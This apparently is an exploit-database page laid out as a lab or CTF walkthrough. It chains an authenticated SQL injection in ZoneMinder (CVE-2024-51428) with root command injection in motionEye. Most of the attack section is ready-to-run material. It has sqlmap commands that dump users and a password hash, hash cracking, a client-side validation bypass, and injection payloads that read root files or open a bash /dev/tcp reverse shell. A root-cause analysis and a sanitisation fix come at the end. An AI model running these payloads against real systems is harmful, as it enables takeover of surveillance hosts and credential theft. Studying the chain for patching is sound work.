Exploit for CVE-2024-51482 CVE-2024-51428 CVE-2024-51482

Name: Exploit for CVE-2024-51482 CVE-2024-51428 CVE-2024-51482
Rating: 5 (655 reviews)
2026-03-07 | CVSS 9.9
## https://sploitus.com/exploit?id=BBFABA9F-EA49-5BC3-90BB-6324CC90206A
# Security Research: Multi-Stage Exploitation of Web-Based Surveillance Systems

This document details a multi-stage exploitation scenario involving an SQL Injection vulnerability in a web application and a Remote Code Execution (RCE) vulnerability in a connected video surveillance system. The objective is to demonstrate a complete compromise chain, from initial access to full system control.

---

## 1. Initial Access: SQL Injection in ZoneMinder (CVE-2024-51428)

### 1.1 Vulnerability Description

The web application, identified as **ZoneMinder version 1.37.63**, was found to be vulnerable to an authenticated SQL Injection (**CVE-2024-51428**). This vulnerability allows an attacker to inject malicious SQL queries through the `tid` parameter within the `removetag` action of the `event` request.

### 1.2 Vulnerability Detection and Enumeration

To confirm the vulnerability, an authenticated session cookie (`ZMSESSID`) is required. The following `sqlmap` command identifies the injection point:

```bash
sqlmap -u "http:///zm/index.php?view=request&request=event&action=removetag&tid=1" \
    --cookie="ZMSESSID=" \
    -p tid --dbms=mysql --batch
```

Once confirmed, the database can be enumerated to extract user credentials:

1.  **Enumerate Databases:**
    ```bash
    sqlmap -u "http:///zm/index.php?view=request&request=event&action=removetag&tid=1" \
        --cookie="ZMSESSID=" \
        -p tid --dbms=mysql --batch --dbs
    ```

2.  **Dump Usernames from `zm.Users`:**
    ```bash
    sqlmap -u "http:///zm/index.php?view=request&request=event&action=removetag&tid=1" \
        --cookie="ZMSESSID=" \
        -p tid --dbms=mysql --batch -D zm -T Users -C "Username" --dump
    ```

    | Username |
    | :--- |
    | admin |
    | mark |
    | superadmin |

3.  **Extract Password Hash for User `mark`:**
    ```bash
    sqlmap -u "http:///zm/index.php?view=request&request=event&action=removetag&tid=1" \
        --cookie="ZMSESSID=" \
        -p tid --dbms=mysql --batch -D zm -T Users -C "Password" --where="Username='mark'" --dump
    ```

    | Username | Password (Bcrypt Hash) |
    | :--- | :--- |
    | mark | `$2y$10$prZGnazejKcuTv5bKNexXOgLyQaok0hq07LW7AJ/QNqZolbXKfFG.` |

### 1.3 Credential Cracking and System Access

The extracted bcrypt hash can be cracked using `John the Ripper`:

```bash
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john --show hash.txt
```
> **Result**: `mark:opensesame`

With these credentials, initial system access is established via SSH:
```bash
ssh mark@
# Password: opensesame
```

---

## 2. Privilege Escalation: motionEye Remote Code Execution

### 2.1 Vulnerability Overview

**motionEye** (versions up to and including **0.43.1b4**) is vulnerable to Remote Code Execution (RCE) due to improper input validation of configuration parameters. Specifically, the application takes user input from the web dashboard and writes it directly into Motion configuration files (`/etc/motioneye/camera-X.conf`) without sanitizing dangerous shell characters.

### 2.2 Discovery and Port Forwarding

Internal enumeration reveals the motionEye service running locally on port **8765**. Access is achieved via SSH port forwarding:

```bash
ssh -L 8765:127.0.0.1:8765 mark@
```

The configuration file `/etc/motioneye/motion.conf` provides the admin password hash:
```bash
cat /etc/motioneye/motion.conf
# @admin_username admin
# @admin_password 989c5a8ee87a0e9521ec81a79187d162109282f0
```

### 2.3 Client-Side Validation Bypass

The web UI attempts to block shell syntax in fields like **Image File Name** using a JavaScript function `configUiValid()`. This can be bypassed by overriding the function in the browser console (F12):

```javascript
configUiValid = function() { return true; };
```

### 2.4 Exploitation via Command Injection

Once validation is bypassed, arbitrary commands can be injected into the **Image File Name** field. When Motion processes the `picture_filename` directive, it evaluates shell syntax like `$(command)`.

#### Method A: Manual Injection via Web UI
1.  Navigate to **Still Images** > **Image File Name**.
2.  Set the value to: `$(touch /tmp/test).%Y-%m-%d-%H-%M-%S`
3.  Apply settings and trigger a snapshot:
    ```bash
    curl "http://127.0.0.1:7999/1/action/snapshot"
    ```

#### Method B: Automated Exploit Script
The following Python script automates the API authentication and command injection process:

```python
import hashlib, urllib.parse, urllib.request, json, re, time

MOTIONEYE_URL = 'http://127.0.0.1:8765'
MOTION_URL = 'http://127.0.0.1:7999'
ADMIN_HASH = '989c5a8ee87a0e9521ec81a79187d162109282f0'

def compute_signature(method, path, body, key):
    # Standard motionEye HMAC signature algorithm
    # ... (implementation details omitted for brevity)
    return signature

def execute_as_root(command):
    # 1. Get current camera config
    # 2. Inject command into 'image_file_name'
    # 3. Post updated config to /config/1/set/
    # 4. Trigger snapshot via Motion API
    pass
```

### 2.5 Achieving Full System Compromise

Since the Motion daemon runs with **root privileges**, injected commands are executed as root.

**Payload for Root Flag:**
```text
$(cp /root/root.txt /tmp/root_flag.txt && chmod 644 /tmp/root_flag.txt).%Y-%m-%d-%H-%M-%S
```

**Weaponizing for Reverse Shell:**
```text
$(python3 -c "import os;os.system('bash -c \"bash -i >& /dev/tcp//4444 0>&1\"')").%Y-%m-%d-%H-%M-%S
```

---

## 3. Root Cause and Remediation

### 3.1 Root Cause Analysis
The vulnerability exists because unsanitized input is passed through the following chain:
`Dashboard JS` → `ConfigHandler.set_config()` → `camera-1.conf` → `motionctl.restart()` → `Motion` parses `picture_filename` → `Shell Execution`.

### 3.2 Remediation: Input Sanitization
The recommended fix involves sanitizing the `image_file_name` field in `config.py` to allow only safe characters:

```python
from re import sub

def sanitize_filename(value):
    # Allow only letters, numbers, %, ., _, -, /
    return (sub(r'[^A-Za-z0-9._%/-]', '_', value).lstrip('/') or '%Y-%m-%d/%H-%M-%S')

# Apply sanitization in motion_camera_ui_to_dict
data['picture_filename'] = sanitize_filename(ui['image_file_name'])
```

---

## 4. Key Security Lessons

1.  **Trust No Client**: Client-side validation is a convenience feature, not a security boundary.
2.  **Sanitize All Inputs**: Any data written to system configuration files must be strictly validated against a whitelist of safe characters.
3.  **Privilege Separation**: Daemons that process user-controlled configuration files should not run as root unless absolutely necessary.
4.  **Defense in Depth**: Secure the internal management interfaces and configuration files to prevent credential leakage.

---

## 5. References

*   **motionEye Project**: [GitHub](https://github.com/motioneye-project/motioneye)
*   **CWE-78**: OS Command Injection
*   **CWE-20**: Improper Input Validation
*   **CWE-116**: Improper Encoding or Escaping of Output